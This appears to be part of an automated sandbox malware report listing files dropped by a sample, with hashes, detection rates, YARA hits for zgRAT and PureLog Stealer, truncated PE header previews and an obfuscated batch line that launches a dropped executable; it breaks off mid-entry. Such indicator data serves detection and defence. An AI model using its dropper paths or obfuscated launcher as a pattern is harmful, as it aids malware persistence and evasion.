                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...l..d.........." .....2...........P... ...`....@.. ...................................@.................................LP..O....`............................................................................... ............... ..H............text....0... ...2.................. ..`.rsrc........`.......4..............@..@.reloc...............8..............@..B.................P......H............p..................................................................................................................................................................................GJ2....mj..R...................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                                  Process:C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe
                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):32256
                                                                                  Entropy (8bit):5.631194486392901
                                                                                  Encrypted:false
                                                                                  SSDEEP:384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
                                                                                  MD5:D8BF2A0481C0A17A634D066A711C12E9
                                                                                  SHA1:7CC01A58831ED109F85B64FE4920278CEDF3E38D
                                                                                  SHA-256:2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
                                                                                  SHA-512:7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
                                                                                  Malicious:true
                                                                                  Antivirus:
                                                                                  • Antivirus: ReversingLabs, Detection: 25%
                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                                  Process:C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe
                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):33792
                                                                                  Entropy (8bit):5.541771649974822
                                                                                  Encrypted:false
                                                                                  SSDEEP:768:VA51bYJhOlZVuS6c4UvEEXLeeG+NOInR:VJEx6f2EEbee/Bn
                                                                                  MD5:2D6975FD1CC3774916D8FF75C449EE7B
                                                                                  SHA1:0C3A915F80D20BFF0BB4023D86ACAF80AF30F98D
                                                                                  SHA-256:75CE6EB6CDDD67D47FB7C5782F45FDC497232F87A883650BA98679F92708A986
                                                                                  SHA-512:6B9792C609E0A3F729AE2F188DE49E66067E3808E5B412E6DC56A555BC95656DA62ECD07D931B05756303A65383B029E7862C04CA5EA879A3FDFB61789BD2580
                                                                                  Malicious:true
                                                                                  Antivirus:
                                                                                  • Antivirus: ReversingLabs, Detection: 38%
                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....|............... ........@.. ....................................@.................................T...W.................................................................................... ............... ..H............text....z... ...|.................. ..`.rsrc................~..............@..@.reloc..............................@..B........................H.......Tl...............h..h....................................................................................................................................................................aF..g~Z........................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                                  Process:C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe
                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):39936
                                                                                  Entropy (8bit):5.660491370279985
                                                                                  Encrypted:false
                                                                                  SSDEEP:768:1Q8H1q0rErIq3y48wo5iJyNJZ+pkw82VhgwgKZ:brErIqxPJRkw/VOwbZ
                                                                                  MD5:240E98D38E0B679F055470167D247022
                                                                                  SHA1:49888CCED719AE78EE3BAE2959402749668AA1C6
                                                                                  SHA-256:C200E1BE39C35F8E57A0E1E241723FDB956089BC8EAD1235042456C7A3C4AD28
                                                                                  SHA-512:93C1B6396C65C9EDACEFD6606A9563935D3C1331454DA69FA75D9B1CCE4D102A5F1B27B63FC3A7E485A083D8DAB1E6C4ECD01DD3CFED9B58DA6F4E90CC4F2998
                                                                                  Malicious:true
                                                                                  Antivirus:
                                                                                  • Antivirus: ReversingLabs, Detection: 8%
                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...n..d...........!.................... ........@.. ....................................@.....................................K.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B.......................H........q...@.......... q...........................................................................................................................................................................-|{.3.g...p................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                                  Process:C:\providerBrowserruntimeCrt\Providerbroker.exe
                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):34816
                                                                                  Entropy (8bit):5.636032516496583
                                                                                  Encrypted:false
                                                                                  SSDEEP:384:JS7LcTqpkHdmLrBmyOLkOPXVcqTZH0uZLSHtciyBDVGehpx3ZPyp1MoCy07G7:J+CaBoXTZH0mUfoGCzpapaFy07
                                                                                  MD5:996BD447A16F0A20F238A611484AFE86
                                                                                  SHA1:CB0F51CE7FEEE1B5F02D3F13E60D67AF448C478D
                                                                                  SHA-256:0CB182B9F8BD0804FC3BBA016926199C536BD7491BA577E089271DC1A63B07BE
                                                                                  SHA-512:80924C19FAF3916DB5F71BE5723B6CB7BB7F731DBBA05B8218746F11FB9470F746B7AC581DB398E388377637811319EF8D6841504DC8EA39C510D7CFCD25184C
                                                                                  Malicious:true
                                                                                  Antivirus:
                                                                                  • Antivirus: ReversingLabs, Detection: 21%
                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...v..d...........!..................... ........@.. ...............................[....@.................................l...O.................................................................................... ............... ..H............text....~... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........b...;...........a.......................................................................................................................................................................k.X...=.%Cu..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                                  Process:C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe
                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):38912
                                                                                  Entropy (8bit):5.679286635687991
                                                                                  Encrypted:false
                                                                                  SSDEEP:768:RH9nQF3DwRvGTYLOFbL79ed5l8UNebCPncg:TyDF0PybCPn
                                                                                  MD5:9E910782CA3E88B3F87826609A21A54E
                                                                                  SHA1:8DBC333244620EDA5D3F1C9EAA6B924455262303
                                                                                  SHA-256:3B311986251EE5A303671108AFBAF43E0255C4CAE1C26CC9600BB0C7D22D3864
                                                                                  SHA-512:592981359F46BBC577BE99DEFE3E2A17998BA2882AAAA20107841BCA97C2121CB97C45BC6EDBFC3F430D31450457CD855751727922AB4BB1A3C12DA050EEC057
                                                                                  Malicious:true
                                                                                  Antivirus:
                                                                                  • Antivirus: ReversingLabs, Detection: 8%
                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!..................... ........@.. ....................................@.................................h...S.................................................................................... ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........k..hC...........j......................................................................................................................................................................`..~...CE.w#'..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                                  Process:C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe
                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):126976
                                                                                  Entropy (8bit):6.057993947082715
                                                                                  Encrypted:false
                                                                                  SSDEEP:3072:V2IJq7YkHFJwBTZtHrC/0/FHkINvdF+nTCkjk1U+1:V2IJq7YbrFHkIrgnTQ
                                                                                  MD5:16B480082780CC1D8C23FB05468F64E7
                                                                                  SHA1:6FDDF86F9F0FBAA189F5CB79E44999A3F1AC2B26
                                                                                  SHA-256:7A080D8BD178EC02C7F39F7F941479074C450C4FDD8E963C993D2FB5537C7708
                                                                                  SHA-512:A165BB5D7972DE124F670BCAC20B4A46727B7CF27D1ED925D02F7CC7C79D7D04122D7C202C67D7EAE798348E8D481F085282EB5B89D84B902607D7EB1155BA19
                                                                                  Malicious:true
                                                                                  Antivirus:
                                                                                  • Antivirus: ReversingLabs, Detection: 21%
                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." ..................... ... ....@.. .......................`......:.....@.....................................O.... .......................@....................................................... ............... ..H............text...$.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B........................H...........(...........<...h.........................................................@.......0.................................................................................................................................Y........;~..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................
                                                                                  Process:C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe
                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):46592
                                                                                  Entropy (8bit):5.870612048031897
                                                                                  Encrypted:false
                                                                                  SSDEEP:768:kEXtbvrhKJukN9LCewFI4eYWza7q9GYBAfNhgi2keA1RLaew5trbNM:NhKZEq4hWO7cAfN6DdA1R9w5x
                                                                                  MD5:3601048DFB8C4A69313A593E74E5A2DE
                                                                                  SHA1:A36A9842EA2D43D7ED024FFB936B4E9AE6E90338
                                                                                  SHA-256:F5F1BA9E344B2F2E9CF90978C6D3518DFB55B316489E360874E3A1144BAC3C05
                                                                                  SHA-512:B619A3D2C5CFADDEC234471FF68F96F19CFBBB5491439C3EE3593E0B2B6F995EBDC208563CC1B04FA383A983540646D02681B0CC039595C1845FE8F7941ABB23
                                                                                  Malicious:true
                                                                                  Antivirus:
                                                                                  • Antivirus: ReversingLabs, Detection: 5%
                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...j..d...........!..................... ........@.. ....................... .......h....@.....................................S.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H............K...........w.................................................................................................................................................................................$A.................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                                  Process:C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe
                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):50176
                                                                                  Entropy (8bit):5.723168999026349
                                                                                  Encrypted:false
                                                                                  SSDEEP:768:7PCvZsxIexhaqgbv8yGk/A/4NPmAQeMeYzlP58gH8zGTCWxttXyZPM:7P4ZsxIelkY/O+DeuzYbM5xXiE
                                                                                  MD5:2E116FC64103D0F0CF47890FD571561E
                                                                                  SHA1:3EF08A9B057D1876C24FC76E937CDA461FAC6071
                                                                                  SHA-256:25EEEA99DCA05BF7651264FA0C07E0E91D89E0DA401C387284E9BE9AFDF79625
                                                                                  SHA-512:39D09DE00E738B01B6D8D423BA05C61D08E281482C83835F4C88D2F87E6E0536DDC0101872CBD97C30F977BC223DFAE9FCB3DB71DD8078B7EB5B5A4D0D5207A8
                                                                                  Malicious:true
                                                                                  Antivirus:
                                                                                  • Antivirus: ReversingLabs, Detection: 17%
                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!..................... ........@.. ....................... .......e....@.....................................K.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H............M...................................................................................................................................................................................Xg;.6.'.1. b9g................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                                  Process:C:\providerBrowserruntimeCrt\Providerbroker.exe
                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):38400
                                                                                  Entropy (8bit):5.699005826018714
                                                                                  Encrypted:false
                                                                                  SSDEEP:768:bvTf5JA7rmkHDkK6/X7rpCA0U4oW+YcSNdb/deQoCDKmc:bTffImkjkK6/QAhaceb/dum
                                                                                  MD5:87765D141228784AE91334BAE25AD743
                                                                                  SHA1:442BA48B1B5BB158E2E6145B0592F81D20CB9C57
                                                                                  SHA-256:9A121719F71383CF66FC36453679B36C8D24CC61EB335D0C304536E5D72AAAEB
                                                                                  SHA-512:77FF7244F4E181A1F2B69A8814E1EFC0B7B55CD551B8D22F5A08039156295F6417D0E2E58265F1C07F8EA2BA3B24D9810B4B3E91B13943688C7450F736746657
                                                                                  Malicious:true
                                                                                  Antivirus:
                                                                                  • Antivirus: ReversingLabs, Detection: 25%
                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...c..d...........!..................... ........@.. ....................................@....................................O.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H.......Dm...?..........<l......................................................................................................................................................................Q[..u.......;..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                                  Process:C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe
                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):28160
                                                                                  Entropy (8bit):5.570953308352568
                                                                                  Encrypted:false
                                                                                  SSDEEP:384:BBOVNMHHPrq2YQGpX0dx+D4uuMig590gQDhJvoKfqeXOWnKNey/B/HM/g/6Y70FB:LOCPAEdx+vuNgD0gQ/gCYoTyn+
                                                                                  MD5:A4F19ADB89F8D88DBDF103878CF31608
                                                                                  SHA1:46267F43F0188DFD3248C18F07A46448D909BF9B
                                                                                  SHA-256:D0613773A711634434DB30F2E35C6892FF54EBEADF49CD254377CAECB204EAA4
                                                                                  SHA-512:23AA30D1CD92C4C69BA23C9D04CEBF4863A9EA20699194F9688B1051CE5A0FAD808BC27EE067A8AA86562F35C352824A53F7FB0A93F4A99470A1C97B31AF8C12
                                                                                  Malicious:true
                                                                                  Antivirus:
                                                                                  • Antivirus: ReversingLabs, Detection: 4%
                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....s.e...........!.....f..........^.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...dd... ...f.................. ..`.rsrc................h..............@..@.reloc...............l..............@..B................@.......H........X..4+...........W..(..................................................................................................................................................................._..\.....+....................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                                  Process:C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe
                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):41472
                                                                                  Entropy (8bit):5.6808219961645605
                                                                                  Encrypted:false
                                                                                  SSDEEP:768:IUVSXpIia8xiZ7tRCoz79t6DrMhvUsJAnmboowvDG:IFXRa/Lzugszmboowb
                                                                                  MD5:6CD78D07F9BD4FECC55CDB392BC5EC89
                                                                                  SHA1:094DE32070BED60A811D983740509054AD017CE4
                                                                                  SHA-256:16CC3B734E72A74F578B63D08D81CC75B6C2445FB631EFD19F8A70D786871AD4
                                                                                  SHA-512:5E25659A66E62F368ACD69790F0CF460008CAA3BB106E45CBA4755896B1872C02438C94E6FB5576891F29B3FEA95D8AAD9BCD7659C179D9619A1CDDB240AEB32
                                                                                  Malicious:true
                                                                                  Antivirus:
                                                                                  • Antivirus: ReversingLabs, Detection: 17%
                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.................... ........@.. ....................................@.................................x...S.................................................................................... ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........s...D...........r............................................................................................................................................................................9..A..%+..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                                  Process:C:\providerBrowserruntimeCrt\Providerbroker.exe
                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):36352
                                                                                  Entropy (8bit):5.668291349855899
                                                                                  Encrypted:false
                                                                                  SSDEEP:384:3+GMbUL+1FjuuGWkgoCFvMiAAsSZH14gXO9XBKeRg3U7ixu8bqMle9dCe4i2+o06:3+T93kgoCFkid/O9sU7io8b1ocl+o
                                                                                  MD5:94DA5073CCC14DCF4766DF6781485937
                                                                                  SHA1:57300CA6033974810B71CF1AB4F047A026924A7A
                                                                                  SHA-256:B81B9FA9B7017BE34F62D30CB16BAAB33757F04CC94EF4D6459C9D3BC768FD18
                                                                                  SHA-512:7D539ECED2F19166F0F6FAE6E2624C0440DEC87AA9751FA82387EECEF9945997ABAE58C886494633BA360B122BCA955B3DDAE26E5256E371A0528F48DFA17871
                                                                                  Malicious:true
                                                                                  Antivirus:
                                                                                  • Antivirus: ReversingLabs, Detection: 21%
                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!..................... ........@.. ....................................@....................................W.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H.......pi..T;...........g..x........................................................................................................................................................................XWJ..%.v0................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                                  Process:C:\providerBrowserruntimeCrt\Providerbroker.exe
                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):39936
                                                                                  Entropy (8bit):5.629584586954759
                                                                                  Encrypted:false
                                                                                  SSDEEP:768:tlPaJVGYXkJSMA2we8qlmau55wC1ND5kwcDl+y5X:chQZwalKdEfDld5
                                                                                  MD5:D478E398EFCD2BD9BDBFEA958F7BEE4F
                                                                                  SHA1:24CAA06949CDA52DB45F487EC2A8D3DE9C3FC1FC
                                                                                  SHA-256:32E821193BE1D81BB3BE97F2719D28A0C7DD2E5BD94DC581D79A1497462EAC9B
                                                                                  SHA-512:0705A42D2EE234D63DBE0A252A2048D85C817D8DF404EBFC12B583BF24AD84E111621727C7CB2369D1A22538354F725AADE067F0BDC4E2EBE2D61D937C130621
                                                                                  Malicious:true
                                                                                  Antivirus:
                                                                                  • Antivirus: ReversingLabs, Detection: 17%
                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!................>.... ........@.. ....................................@....................................O.................................................................................... ............... ..H............text...D.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B................ .......H........r..h?..........Lq..8....................................................................................................................................................................M..d..u7 ...jj.................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                                  Process:C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe
                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):69632
                                                                                  Entropy (8bit):5.932541123129161
                                                                                  Encrypted:false
                                                                                  SSDEEP:1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
                                                                                  MD5:F4B38D0F95B7E844DD288B441EBC9AAF
                                                                                  SHA1:9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
                                                                                  SHA-256:AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
                                                                                  SHA-512:2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
                                                                                  Malicious:true
                                                                                  Antivirus:
                                                                                  • Antivirus: ReversingLabs, Detection: 50%
                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;.d.........." .................'... ...@....@.. ....................................@.................................\'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......l....^..........t...............................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k:..AOg.......s..t".5.
                                                                                  Process:C:\providerBrowserruntimeCrt\Providerbroker.exe
                                                                                  File Type:ASCII text, with very long lines (870), with no line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):870
                                                                                  Entropy (8bit):5.915266072760663
                                                                                  Encrypted:false
                                                                                  SSDEEP:24:xohgSyQttwZjBjJfGy8AtwRuVrApJBudjp:xoJyStETePbRQE3Udjp
                                                                                  MD5:6F1A22458D2045883D62674F48E5D539
                                                                                  SHA1:2ADC8DCB9D6E6B38F0B82B3CBB26DDF70C215EA4
                                                                                  SHA-256:A1A652836BBCC6CF2B3F7D9C624CCB26C4FB5FA645AA7D9029DAF4EEEB8DE2A0
                                                                                  SHA-512:2F354E7F517856331C91531B005256598D0AF3FDC9D89BA0CB000071F7596AD5B0EA9B979BEA16B006E69F572023D9110F402D974B46C16DE3B15CCB4B9A886C
                                                                                  Malicious:false
                                                                                  Preview:cH0ppcGSOB3ci9JhxE1qY3C4WLD3bRroPuRmO2MZlvzOXeRd5V6fHBdjF6SeZN16UPNxshS52cEnDxg13j7FVLgORrhRjrAY434IRdvYDBno6zfRabkzPvlIs8gAAAVKcqsK3XkayjCTi2SbMP1IGKIJRvZS6uXCqcMQHUYC0KBqtRk0qFyuJMERhj2H8RdDL9nFpCT11zR6IbaAKjl15m3dY4sibQEjq7ftoeKov73U4HJGJ26YpmHiGJruTvZkusQK6rVpY6F8tiiQvmYjTp3Dz6mfxZUAhSjM18JchQAthJzikb9rW0RFzMU9Ez28mFaa9WYwc6BCpKgqHE4WamnrBeXpnKXrYBGbsYiOCNPZyOZoqo1A5gi9btZe8tJSjUooDE7tfqTNXN3wEs89SWw1cH998DPTE7zdkvllqIfONVlNznaPuJ9NiwL5F8ubaAIZYaMTHXSJ1hoGfvKVn9i47m5xjpfsXDxNMMzZaGIW1zWBIFZTyZxbbOcvfYub1kwxtb3T5u4h1LCHQ4pdPM47QWv8tE4CWqeQDiRqLGYDfQjPLUflsQMpqyhWq5j101LKqwErm9SJx0c9xfwZjTTFezkOB4APggMnEYjZQx8t8D1zWhjKJKShhFq1Lzpr8CmRnz4Y6WJvUkHb7v2eVzGWOpF9srOaHQv5akLgmLOwAhM78P4a7LWI6QD8t5pOItnDzLAWjV1KlTVrcHAcxyc64m9KhNwqfAoR3IIwOh0lTMhm4Wfm4NbUQrJNM0zWiLpkpExU9OOP70msEXQLsKvSiUAM95jYseDIg77ziLmq8MXaEaIzknnYZWCVDkUEozgcxdLHaamghFTW7kHiwuyE0otJ5lw80iBJp4
                                                                                  Process:C:\providerBrowserruntimeCrt\Providerbroker.exe
                                                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):10393088
                                                                                  Entropy (8bit):3.7593823756442295
                                                                                  Encrypted:false
                                                                                  SSDEEP:98304:w4nrXaOTm08kwmLyo/0YwWXWkcftzkmaGHBXRaLWUJDCU:w4rXbm08oLSYwuWkcfCmPXRaLLVCU
                                                                                  MD5:ADAE028E0A5A72D219A02BB06D92241A
                                                                                  SHA1:7CAE683F773D541BD5C76CE6491CCB2F2F05C08A
                                                                                  SHA-256:3AC51E8FC3AA517AEA4640EFAFFA1B04301C14DC876104E09AB9B7A3A95A0415
                                                                                  SHA-512:FE8EF741DE45A6BDE2B48322EF33EE9662B0CBC4CAABB582F405850CB0AB58D286E96C5E28E47A0968B17BAE6874F938973D6ED7F27E6A9DB3A16ED0B63AA1E6
                                                                                  Malicious:true
                                                                                  Yara Hits:
                                                                                  • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Windows\PrintDialog\pris\spoolsv.exe, Author: Joe Security
                                                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Windows\PrintDialog\pris\spoolsv.exe, Author: Joe Security
                                                                                  Antivirus:
                                                                                  • Antivirus: ReversingLabs, Detection: 79%
                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...u..e.................j;...........;.. ....;...@.. ........................;...........@...................................;.K.....;.p.....................;...................................................... ............... ..H............text...4i;.. ...j;................. ..`.rsrc...p.....;......l;.............@....reloc........;......p;.............@..B..................;.....H.......4..........p.......7.0.\.;......................................0..........(.... ........8........E........9...*...)...8....(.... ....~....{....:....& ....8....*(.... ....8....(.... ....~....{....9....& ....8........0.......... ........8........E........u...........P.......8....~....(G... .... .... ....s....~....(K....... ....~....{....:....& ....8.......... ....~....{e...9y...& ....8n.......~....(O...~....(S... ....<.... ....~....{e...98...& ....8-...r...ps....z*8..
                                                                                  Process:C:\providerBrowserruntimeCrt\Providerbroker.exe
                                                                                  File Type:ASCII text, with no line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):55
                                                                                  Entropy (8bit):5.071913349730951
                                                                                  Encrypted:false
                                                                                  SSDEEP:3:ZWfSxRyfJzxy1d0Zib+n:USGE+
                                                                                  MD5:DA57800C5E60B02CED78DEAE55FFBA92
                                                                                  SHA1:4F84B6C5819C63E2FBA45C21EA693BFA12583B73
                                                                                  SHA-256:4390DF7E6A072B6CE09AC35A059F9D9FB30CDD845EB255A5F03843DF24E81B00
                                                                                  SHA-512:708C4D50932C29F2F3A2C1FE71FDBBCA491FCF474319CE6FFE8A8433073343D21ADBA36AAA0A13C01D925380CD2A44AB162A4535545454CA6351F3D35942ECFC
                                                                                  Malicious:false
                                                                                  Preview:tgu3OcCkhr6TmUO55DBtWzl1g2TQ1FWNhBonT1Q9Ozxz4YHyaJ9bHkq
                                                                                  Process:C:\providerBrowserruntimeCrt\Providerbroker.exe
                                                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):10393088
                                                                                  Entropy (8bit):3.7593823756442295
                                                                                  Encrypted:false
                                                                                  SSDEEP:98304:w4nrXaOTm08kwmLyo/0YwWXWkcftzkmaGHBXRaLWUJDCU:w4rXbm08oLSYwuWkcfCmPXRaLLVCU
                                                                                  MD5:ADAE028E0A5A72D219A02BB06D92241A
                                                                                  SHA1:7CAE683F773D541BD5C76CE6491CCB2F2F05C08A
                                                                                  SHA-256:3AC51E8FC3AA517AEA4640EFAFFA1B04301C14DC876104E09AB9B7A3A95A0415
                                                                                  SHA-512:FE8EF741DE45A6BDE2B48322EF33EE9662B0CBC4CAABB582F405850CB0AB58D286E96C5E28E47A0968B17BAE6874F938973D6ED7F27E6A9DB3A16ED0B63AA1E6
                                                                                  Malicious:true
                                                                                  Antivirus:
                                                                                  • Antivirus: ReversingLabs, Detection: 79%
                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...u..e.................j;...........;.. ....;...@.. ........................;...........@...................................;.K.....;.p.....................;...................................................... ............... ..H............text...4i;.. ...j;................. ..`.rsrc...p.....;......l;.............@....reloc........;......p;.............@..B..................;.....H.......4..........p.......7.0.\.;......................................0..........(.... ........8........E........9...*...)...8....(.... ....~....{....:....& ....8....*(.... ....8....(.... ....~....{....9....& ....8........0.......... ........8........E........u...........P.......8....~....(G... .... .... ....s....~....(K....... ....~....{....:....& ....8.......... ....~....{e...9y...& ....8n.......~....(O...~....(S... ....<.... ....~....{e...98...& ....8-...r...ps....z*8..
                                                                                  Process:C:\Users\user\Desktop\9FwQYJSj4N.exe
                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):95
                                                                                  Entropy (8bit):5.037607999811609
                                                                                  Encrypted:false
                                                                                  SSDEEP:3:1wPzlOMg/lGpQoshSim7xkr5XAHqb4Wj:cOXlfrKE2KF
                                                                                  MD5:6A27BB68B8361F5C428BC5912E0B30A8
                                                                                  SHA1:8F9454891678312A7F0AD11C5C358C43918744BE
                                                                                  SHA-256:A38CFF54666BB5717BE57BC2795DD5DC501042C413E75256F0991377DC531E98
                                                                                  SHA-512:879FA7E224BB2445E32871A6C4A13EAA5919336F0E272E6A0AE779A79E7072F48AA68AEDD0EEF7071159DDBD68703288E7EBFBBA39153AF814D511DA28DCB799
                                                                                  Malicious:false
                                                                                  Preview:%uUjYGz%%kBVzEYErcZ%..%chsfXtLuMIxldNw%"C:\providerBrowserruntimeCrt/Providerbroker.exe"%iqeGd%
                                                                                  Process:C:\Users\user\Desktop\9FwQYJSj4N.exe
                                                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):10393088
                                                                                  Entropy (8bit):3.7593823756442295
                                                                                  Encrypted:false
                                                                                  SSDEEP:98304:w4nrXaOTm08kwmLyo/0YwWXWkcftzkmaGHBXRaLWUJDCU:w4rXbm08oLSYwuWkcfCmPXRaLLVCU
                                                                                  MD5:ADAE028E0A5A72D219A02BB06D92241A
                                                                                  SHA1:7CAE683F773D541BD5C76CE6491CCB2F2F05C08A
                                                                                  SHA-256:3AC51E8FC3AA517AEA4640EFAFFA1B04301C14DC876104E09AB9B7A3A95A0415
                                                                                  SHA-512:FE8EF741DE45A6BDE2B48322EF33EE9662B0CBC4CAABB582F405850CB0AB58D286E96C5E28E47A0968B17BAE6874F938973D6ED7F27E6A9DB3A16ED0B63AA1E6
                                                                                  Malicious:true
                                                                                  Yara Hits:
